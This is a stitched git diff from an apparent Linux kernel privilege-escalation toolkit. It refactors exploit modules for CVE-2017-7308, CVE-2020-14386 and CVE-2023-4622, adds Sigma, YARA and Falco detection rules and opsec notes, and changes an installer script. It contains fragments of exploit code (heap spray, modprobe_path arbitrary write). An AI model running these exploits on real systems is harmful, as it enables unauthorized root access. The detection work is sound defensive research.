+    <text x="764" y="38" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="22" fill="#ecedf7">151</text>
+    <text x="810" y="37" font-family="'Inter',sans-serif" font-size="16" fill="#8a8a9d">detection rules</text>
+  </g>
+
+  <!-- terminal mockup -->
+  <g transform="translate(80,478)">
+    <rect x="0" y="0" width="1040" height="92" rx="12" fill="#0a0a14" stroke="#25253c"/>
+    <!-- bar -->
+    <circle cx="22" cy="22" r="6" fill="#ff5f57"/>
+    <circle cx="42" cy="22" r="6" fill="#febc2e"/>
+    <circle cx="62" cy="22" r="6" fill="#28c840"/>
+    <line x1="0" y1="44" x2="1040" y2="44" stroke="#1c1c2d"/>
+    <text x="24" y="78" font-family="'JetBrains Mono',monospace" font-size="20" fill="#ecedf7">
+      <tspan fill="#10b981">$</tspan> skeletonkey --explain nf_tables    <tspan fill="#5b5b75"># operator briefing in one command</tspan>
+    </text>
+  </g>
+
+  <!-- subtle url at very bottom -->
+  <text x="1120" y="610" font-family="'JetBrains Mono',monospace" font-size="14" fill="#5b5b75" text-anchor="end">
+    karazajac.github.io/SKELETONKEY
+  </text>
+</svg>
@@ -19,7 +19,12 @@
 #   0 — installed successfully
 #   1 — error (unsupported arch, download failure, permission denied)

-set -euo pipefail
+# POSIX-friendly: -eu is universal, pipefail only on shells that
+# support it (bash, ksh, dash >= 0.5.12). Without pipefail the
+# installer still exits on the first hard error since every curl/
+# tar/install step is checked explicitly.
+set -eu
+(set -o pipefail) 2>/dev/null && set -o pipefail || true

 REPO="${SKELETONKEY_REPO:-KaraZajac/SKELETONKEY}"
 VERSION="${SKELETONKEY_VERSION:-latest}"
@@ -29,11 +34,29 @@ log()   { printf '[\033[1;36m*\033[0m] %s\n' "$*" >&2; }
 ok()    { printf '[\033[1;32m+\033[0m] %s\n' "$*" >&2; }
 fail()  { printf '[\033[1;31m-\033[0m] %s\n' "$*" >&2; exit 1; }

-# Detect architecture
+# Detect architecture. Default to the musl-static binary on both
+# x86_64 and arm64 — works on every libc (glibc 2.x of any version,
+# musl, uclibc); costs ~800 KB extra vs dynamic but eliminates the
+# GLIBC_2.NN portability ceiling that bites on Debian-stable, older
+# RHEL hosts, and Alpine. Set SKELETONKEY_DYNAMIC=1 to fetch the
+# smaller dynamic build (needs glibc >= 2.38 for x86_64 — Ubuntu
+# 24.04 / Debian 13 / RHEL 10).
 arch=$(uname -m)
 case "$arch" in
-    x86_64|amd64)        target=x86_64 ;;
-    aarch64|arm64)       target=arm64  ;;
+    x86_64|amd64)
+        if [ "${SKELETONKEY_DYNAMIC:-0}" = "1" ]; then
+            target=x86_64
+        else
+            target=x86_64-static
+        fi
+        ;;
+    aarch64|arm64)
+        if [ "${SKELETONKEY_DYNAMIC:-0}" = "1" ]; then
+            target=arm64
+        else
+            target=arm64-static
+        fi
+        ;;
    *) fail "Unsupported architecture: $arch (only x86_64 and arm64 currently)" ;;
 esac
 log "detected arch: $target"
@@ -1,27 +0,0 @@
-# Fragnesia — CVE pending
-
-> ⚪ **PLANNED** stub. See [`../../ROADMAP.md`](../../ROADMAP.md)
-> Phase 7+.
-
-## Summary
-
-ESP shared-frag in-place encrypt path can be coerced into writing
-into the page cache of an unrelated file. Same primitive shape as
-Dirty Frag, different reach.
-
-## Status
-
-Audit-stage. See
-`security-research/findings/audit_leak_write_modprobe_backups_2026-05-16.md`
-section on backup primitives. Notably: trigger appears to require
-CAP_NET_ADMIN inside a userns netns. On kCTF (shared net_ns) that's
-cap-dead, but on host systems where user_ns clone is enabled it's
-reachable.
-
-## Decision needed before implementing
-
-Is the unprivileged-userns-netns scenario in scope for SKELETONKEY? If
-yes, this module ships. If we restrict to "default Linux user
-account, no namespace tricks," this module is out of scope.
-
-## Not started.
@@ -45,9 +45,6 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -55,13 +52,19 @@
 #include <stdint.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
 #include <errno.h>
 #include <fcntl.h>
 #include <sched.h>
 #include <sys/wait.h>
 #include <sys/socket.h>
-
-#ifdef __linux__
 #include <sys/mman.h>
 #include <sys/ioctl.h>
 #include <sys/syscall.h>
@@ -72,52 +75,6 @@
 #include <linux/if_ether.h>
 #include <linux/if_arp.h>
 #include <poll.h>
-#endif
-
-/* ---------- macOS / non-linux build stubs ---------------------------
- * Modules in SKELETONKEY are dev-built on macOS and run-built on Linux.
- * Provide empty stubs so syntax checks pass without Linux headers.
- * The exploit path is gated at runtime on the kernel version anyway,
- * so the stubs are never reached on macOS targets. */
-#ifndef __linux__
-#define CLONE_NEWUSER       0x10000000
-#define CLONE_NEWNET        0x40000000
-#define ETH_P_ALL           0x0003
-#define ETH_P_8021Q         0x8100
-#define ETH_P_8021AD        0x88A8
-#define ETH_P_IP            0x0800
-#define ETH_ALEN            6
-#define ETH_HLEN            14
-#define VLAN_HLEN           4
-#define IFF_UP              0x01
-#define IFF_RUNNING         0x40
-#define SIOCSIFFLAGS        0x8914
-#define SIOCGIFINDEX        0x8933
-#define SIOCGIFFLAGS        0x8913
-#define SOL_PACKET          263
-#define PACKET_RX_RING      5
-#define PACKET_VERSION      10
-#define PACKET_QDISC_BYPASS 20
-#define TPACKET_V2          1
-#define PACKET_HOST         0
-struct sockaddr_ll { unsigned short sll_family; unsigned short sll_protocol; int sll_ifindex; int dummy; };
-struct ifreq { char name[16]; union { int ifr_ifindex; short ifr_flags; } u; };
-struct tpacket_req { unsigned int tp_block_size, tp_block_nr, tp_frame_size, tp_frame_nr; };
-struct tpacket2_hdr { unsigned int tp_status, tp_len, tp_snaplen; unsigned short tp_mac, tp_net; };
-struct pollfd { int fd; short events, revents; };
-#define POLLIN 0x001
-__attribute__((unused)) static int    ioctl(int a, unsigned long b, ...) { (void)a; (void)b; errno=ENOSYS; return -1; }
-__attribute__((unused)) static void  *mmap(void *a, size_t b, int c, int d, int e, long f) { (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return (void*)-1; }
-__attribute__((unused)) static int    munmap(void *a, size_t b) { (void)a;(void)b; return -1; }
-__attribute__((unused)) static int    setsockopt(int a, int b, int c, const void *d, unsigned int e) { (void)a;(void)b;(void)c;(void)d;(void)e; errno=ENOSYS; return -1; }
-__attribute__((unused)) static int    poll(struct pollfd *a, unsigned long b, int c) { (void)a;(void)b;(void)c; errno=ENOSYS; return -1; }
-__attribute__((unused)) static unsigned short htons(unsigned short x) { return x; }
-#define MAP_SHARED  0x01
-#define MAP_LOCKED  0x2000
-#define PROT_READ   0x1
-#define PROT_WRITE  0x2
-#define MAP_FAILED ((void *)-1)
-#endif

 static const struct kernel_patched_from af_packet2_patched_branches[] = {
    {4,  9, 235},
@@ -135,53 +92,44 @@ static const struct kernel_range af_packet2_range = {
                      sizeof(af_packet2_patched_branches[0]),
 };

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static skeletonkey_result_t af_packet2_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] af_packet2: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] af_packet2: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 4.6 (tpacket_rcv VLAN path). Pre-4.6 immune. */
-    if (v.major < 4 || (v.major == 4 && v.minor < 6)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 4, 6, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] af_packet2: kernel %s predates the bug (introduced in 4.6)\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&af_packet2_range, &v);
+    bool patched = kernel_range_is_patched(&af_packet2_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] af_packet2: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] af_packet2: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] af_packet2: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] af_packet2: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] af_packet2: user_ns+net_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] af_packet2: user_ns denied → unprivileged exploit unreachable\n");
        }
@@ -223,8 +171,6 @@ static skeletonkey_result_t af_packet2_detect(const struct skeletonkey_ctx *ctx)
 * the primitive. It does not land cred overwrite.
 */

-#ifdef __linux__
-
 /* sendmmsg spray helper — best-effort skb groom. Adjacent kernel slab
 * objects are sprayed so the OOB write lands on attacker bytes. */
 static void af_packet2_skb_spray(int n_iters)
@@ -440,15 +386,6 @@ static int af_packet2_primitive_child(const struct skeletonkey_ctx *ctx)
    return 0;
 }

-#else /* !__linux__: provide a stub for macOS sanity builds */
-static int af_packet2_primitive_child(const struct skeletonkey_ctx *ctx)
-{
-    (void)ctx;
-    fprintf(stderr, "[-] af_packet2: linux-only primitive — non-linux build\n");
-    return -1;
-}
-#endif
-
 /* ---- Full-chain finisher (--full-chain, x86_64 only) ----------------
 *
 * Arb-write strategy (Or Cohen's sk_buff-data-pointer hijack):
@@ -490,7 +427,7 @@ struct afp2_arb_ctx {
    int n_attempts;            /* spray/fire rounds before giving up */
 };

-#if defined(__x86_64__) && defined(__linux__)
+#if defined(__x86_64__)
 static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
 {
    struct afp2_arb_ctx *c = (struct afp2_arb_ctx *)vctx;
@@ -508,9 +445,7 @@ static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vc
     * frame would then write our payload (the modprobe_path string)
     * into the forged ->data target. */
    for (int i = 0; i < c->n_attempts; i++) {
-#ifdef __linux__
        af_packet2_skb_spray(8);
-#endif
        pid_t p = fork();
        if (p < 0) return -1;
        if (p == 0) {
@@ -535,9 +470,7 @@ static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vc
        }
        int st;
        waitpid(p, &st, 0);
-#ifdef __linux__
        af_packet2_skb_spray(8);
-#endif
    }

    /* LAST-RESORT depth: we have fired the trigger + spray but cannot
@@ -572,8 +505,11 @@ static skeletonkey_result_t af_packet2_exploit(const struct skeletonkey_ctx *ctx
        return pre;
    }

-    /* 2. Refuse if already root. */
-    if (geteuid() == 0) {
+    /* 2. Refuse if already root. Consult ctx->host first so unit tests
+     *    can construct a non-root fingerprint regardless of the test
+     *    process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] af_packet2: already running as root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -664,7 +600,7 @@ static skeletonkey_result_t af_packet2_exploit(const struct skeletonkey_ctx *ctx
                            "    skeletonkey intentionally does not embed per-kernel offsets.\n");
        }
        if (ctx->full_chain) {
-#if defined(__x86_64__) && defined(__linux__)
+#if defined(__x86_64__)
            /* --full-chain: resolve kernel offsets and run the Or-Cohen
             * sk_buff-data-pointer hijack via the shared modprobe_path
             * finisher. Per the verified-vs-claimed bar: if we can't
@@ -703,6 +639,29 @@ static skeletonkey_result_t af_packet2_exploit(const struct skeletonkey_ctx *ctx
    }
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: AF_PACKET + TPACKET_V2 + tpacket_rcv VLAN
+ * underflow are Linux-only kernel surface. Stub out cleanly so the
+ * module still registers and `--list` / `--detect-rules` work on
+ * macOS/BSD dev boxes — and so the top-level `make` actually completes
+ * there. */
+static skeletonkey_result_t af_packet2_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] af_packet2: Linux-only module "
+                "(AF_PACKET TPACKET_V2 + user_ns) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t af_packet2_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] af_packet2: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 static const char af_packet2_auditd[] =
    "# AF_PACKET VLAN LPE (CVE-2020-14386) — auditd detection rules\n"
    "# Same syscall surface as CVE-2017-7308 — share the skeletonkey-af-packet\n"
@@ -710,6 +669,54 @@ static const char af_packet2_auditd[] =
    "# non-root via userns is the canonical footprint.\n"
    "-a always,exit -F arch=b64 -S socket -F a0=17 -k skeletonkey-af-packet\n";

+static const char af_packet2_sigma[] =
+    "title: Possible CVE-2020-14386 AF_PACKET VLAN underflow exploitation\n"
+    "id: b83c6fa2-skeletonkey-af-packet2\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the AF_PACKET TPACKET_V2 nested-VLAN frame pattern:\n"
+    "  unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by socket(AF_PACKET),\n"
+    "  PACKET_RX_RING setsockopt, and a sendmmsg burst (>=64) on a unix\n"
+    "  socketpair spray. False positives: legitimate packet capture in\n"
+    "  rootless containers.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:    {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  afp:       {type: 'SYSCALL', syscall: 'socket', a0: 17}\n"
+    "  send_burst:{type: 'SYSCALL', syscall: 'sendmmsg'}\n"
+    "  condition: userns and afp and send_burst\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2020.14386]\n";
+
+static const char af_packet2_yara[] =
+    "rule af_packet2_cve_2020_14386 : cve_2020_14386 heap_spray\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2020-14386\"\n"
+    "        description = \"AF_PACKET VLAN-underflow spray tag (skeletonkey-afp-fc-)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"skeletonkey-afp-fc-\" ascii\n"
+    "    condition:\n"
+    "        $tag\n"
+    "}\n";
+
+static const char af_packet2_falco[] =
+    "- rule: AF_PACKET TPACKET_V2 nested-VLAN trigger by non-root\n"
+    "  desc: |\n"
+    "    A non-root process sets up TPACKET_V2 and sends a burst of\n"
+    "    sendmmsg packets carrying nested VLAN tags (CVE-2020-14386\n"
+    "    trigger). False positives: legitimate VLAN/network capture\n"
+    "    tools in unprivileged containers.\n"
+    "  condition: >\n"
+    "    evt.type = sendmmsg and fd.type = socket and\n"
+    "    fd.sockfamily = AF_PACKET and not user.uid = 0\n"
+    "  output: >\n"
+    "    sendmmsg burst on AF_PACKET socket by non-root\n"
+    "    (user=%user.name pid=%proc.pid vlen=%evt.arg.vlen)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2020.14386]\n";
+
 const struct skeletonkey_module af_packet2_module = {
    .name           = "af_packet2",
    .cve            = "CVE-2020-14386",
@@ -721,9 +728,11 @@ const struct skeletonkey_module af_packet2_module = {
    .mitigate       = NULL,
    .cleanup        = NULL,
    .detect_auditd  = af_packet2_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = af_packet2_sigma,
+    .detect_yara    = af_packet2_yara,
+    .detect_falco   = af_packet2_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + TPACKET_V2 ring on AF_PACKET; crafts nested-VLAN ETH_P_8021AD frames with 0x88A8/0x8100 TPIDs to trigger tpacket_rcv underflow; fires 256 frames + 64 sendmmsg via AF_UNIX socketpair spray. Tag 'skeletonkey-afp-fc-' visible in KASAN splats. Audit-visible via socket(AF_PACKET) + sendmsg/sendto from userns. No persistent artifacts; kernel cleans up on child exit.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_af_packet2(void)
@@ -60,17 +60,23 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
 #include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
 #include <errno.h>
 #include <fcntl.h>
-#include <unistd.h>
 #include <sched.h>
 #include <sys/wait.h>
 #include <sys/socket.h>
@@ -106,44 +112,35 @@ static const struct kernel_range af_packet_range = {
                      sizeof(af_packet_patched_branches[0]),
 };

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static skeletonkey_result_t af_packet_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] af_packet: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] af_packet: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

-    bool patched = kernel_range_is_patched(&af_packet_range, &v);
+    bool patched = kernel_range_is_patched(&af_packet_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] af_packet: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] af_packet: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] af_packet: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] af_packet: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] af_packet: user_ns+net_ns clone (CAP_NET_RAW gate): %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] af_packet: user_ns denied → "
                            "unprivileged exploit unreachable\n");
@@ -718,8 +715,11 @@ static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx)
        return pre;
    }

-    /* 2. Refuse if already root. */
-    if (geteuid() == 0) {
+    /* 2. Refuse if already root. Consult ctx->host first so unit tests
+     *    can construct a non-root fingerprint regardless of the test
+     *    process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] af_packet: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -727,16 +727,19 @@ static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx)
    /* 3. Resolve offsets for THIS kernel. If we don't have them, bail
     *    early — the kernel-write walk needs them. The integrator can
     *    extend known_offsets[] for new distro builds. */
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] af_packet: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }
    struct af_packet_offsets off;
-    if (!resolve_offsets(&off, &v)) {
+    if (!resolve_offsets(&off, v)) {
        fprintf(stderr, "[-] af_packet: no offset table for kernel %s\n"
                        "    set SKELETONKEY_AFPACKET_OFFSETS=<task_cred>:<cred_uid>:<cred_size>\n"
                        "    (hex). Known table covers Ubuntu 16.04 (4.4) and 18.04 (4.15).\n",
-                v.release);
+                v->release);
        return SKELETONKEY_PRECOND_FAIL;
    }
    if (!ctx->json) {
@@ -858,12 +861,85 @@ static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx)
 #endif
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: AF_PACKET + unshare(CLONE_NEWUSER|CLONE_NEWNET)
+ * + TPACKET_V3 ring are Linux-only kernel surface; the TPACKET_V3
+ * integer-overflow primitive is structurally unreachable elsewhere.
+ * Stub out cleanly so the module still registers and `--list` /
+ * `--detect-rules` work on macOS/BSD dev boxes — and so the top-level
+ * `make` actually completes there. */
+static skeletonkey_result_t af_packet_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] af_packet: Linux-only module "
+                "(AF_PACKET TPACKET_V3 + user_ns) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] af_packet: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 static const char af_packet_auditd[] =
    "# AF_PACKET TPACKET_V3 LPE (CVE-2017-7308) — auditd detection rules\n"
    "# Flag AF_PACKET socket creation from non-root via userns.\n"
    "-a always,exit -F arch=b64 -S socket -F a0=17 -k skeletonkey-af-packet\n"
    "-a always,exit -F arch=b64 -S unshare -k skeletonkey-af-packet-userns\n";

+static const char af_packet_sigma[] =
+    "title: Possible CVE-2017-7308 AF_PACKET TPACKET_V3 exploitation\n"
+    "id: a72b5e91-skeletonkey-af-packet\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the AF_PACKET TPACKET_V3 integer-overflow setup pattern:\n"
+    "  unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by socket(AF_PACKET)\n"
+    "  and a PACKET_RX_RING setsockopt + sendmmsg burst. False positives:\n"
+    "  network sandboxes / containers running raw-packet apps inside\n"
+    "  userns; correlate process tree to distinguish.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:    {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  afp:       {type: 'SYSCALL', syscall: 'socket', a0: 17}\n"
+    "  send_burst:{type: 'SYSCALL', syscall: 'sendmmsg'}\n"
+    "  condition: userns and afp and send_burst\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2017.7308]\n";
+
+static const char af_packet_yara[] =
+    "rule af_packet_cve_2017_7308 : cve_2017_7308 heap_spray\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2017-7308\"\n"
+    "        description = \"AF_PACKET TPACKET_V3 spray tag from skeletonkey/iam-root tooling\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag1 = \"iamroot-afp-tag\" ascii\n"
+    "        $tag2 = \"skeletonkey-afp-fc-\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char af_packet_falco[] =
+    "- rule: AF_PACKET TPACKET_V3 setup by non-root in userns\n"
+    "  desc: |\n"
+    "    A non-root process creates an AF_PACKET socket and sets up a\n"
+    "    TPACKET_V3 ring inside a user namespace. CVE-2017-7308 trigger\n"
+    "    requires CAP_NET_RAW which userns provides. False positives:\n"
+    "    legitimate packet-capture tools running rootless (rare).\n"
+    "  condition: >\n"
+    "    evt.type = setsockopt and evt.arg.optname contains PACKET_RX_RING\n"
+    "    and not user.uid = 0\n"
+    "  output: >\n"
+    "    AF_PACKET TPACKET_V3 ring setup by non-root\n"
+    "    (user=%user.name proc=%proc.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2017.7308]\n";
+
 const struct skeletonkey_module af_packet_module = {
    .name           = "af_packet",
    .cve            = "CVE-2017-7308",
@@ -875,9 +951,11 @@ const struct skeletonkey_module af_packet_module = {
    .mitigate       = NULL,
    .cleanup        = NULL,
    .detect_auditd  = af_packet_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = af_packet_sigma,
+    .detect_yara    = af_packet_yara,
+    .detect_falco   = af_packet_falco,
+    .opsec_notes    = "Creates AF_PACKET socket and TPACKET_V3 ring inside unshare(CLONE_NEWUSER|CLONE_NEWNET); triggers integer overflow with crafted tp_block_size/tp_block_nr and sprays ~200 loopback frames. Audit-visible via socket(AF_PACKET) (a0=17) + sendmmsg from a userns process; KASAN tag 'iamroot-afp-tag' may appear in dmesg if enabled. No persistent files. No cleanup callback - kernel state unwinds on child exit.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_af_packet(void)
@@ -58,6 +58,7 @@
 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/host.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"

@@ -104,6 +105,7 @@ static const struct kernel_patched_from af_unix_gc_patched_branches[] = {
    {5, 10, 197},
    {5, 15, 130},
    {6,  1,  51},   /* 6.1 LTS */
+    {6,  4,  13},   /* 6.4.x stable (per Debian tracker — forky/sid/trixie) */
    {6,  5,   0},   /* mainline fix landed in 6.5 (technically 6.6-rc1
                       but stable 6.5.x carries the patch) */
 };
@@ -129,9 +131,14 @@ static bool can_create_af_unix(void)

 static skeletonkey_result_t af_unix_gc_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] af_unix_gc: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] af_unix_gc: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

@@ -139,10 +146,10 @@ static skeletonkey_result_t af_unix_gc_detect(const struct skeletonkey_ctx *ctx)
     * the dawn of time. ANY kernel below the fix is vulnerable. The
     * kernel_range walker handles "older than every entry" correctly
     * (returns false → not patched → vulnerable). */
-    bool patched = kernel_range_is_patched(&af_unix_gc_range, &v);
+    bool patched = kernel_range_is_patched(&af_unix_gc_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }
@@ -157,7 +164,7 @@ static skeletonkey_result_t af_unix_gc_detect(const struct skeletonkey_ctx *ctx)
    }

    if (!ctx->json) {
-        fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] af_unix_gc: bug is reachable as PLAIN UNPRIVILEGED USER\n"
                        "    (no userns / no CAP_* required — AF_UNIX is universally\n"
                        "    creatable). The race window is microseconds wide and\n"
@@ -549,7 +556,8 @@ static skeletonkey_result_t af_unix_gc_exploit_linux(const struct skeletonkey_ct
        fprintf(stderr, "[-] af_unix_gc: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] af_unix_gc: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -825,6 +833,56 @@ static const char af_unix_gc_auditd[] =
    "-a always,exit -F arch=b64 -S sendmsg    -k skeletonkey-afunixgc-sendmsg\n"
    "-a always,exit -F arch=b64 -S msgsnd     -k skeletonkey-afunixgc-spray\n";

+static const char af_unix_gc_sigma[] =
+    "title: Possible CVE-2023-4622 AF_UNIX GC UAF race\n"
+    "id: c45d7eb3-skeletonkey-af-unix-gc\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects tight-loop socketpair(AF_UNIX) + sendmsg with SCM_RIGHTS\n"
+    "  + msgsnd grooming pattern characteristic of the AF_UNIX garbage\n"
+    "  collector race. False positives: legitimate IPC apps use\n"
+    "  SCM_RIGHTS, but the high-frequency close-and-recreate cycle is\n"
+    "  unusual outside fuzzing / exploit harnesses.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
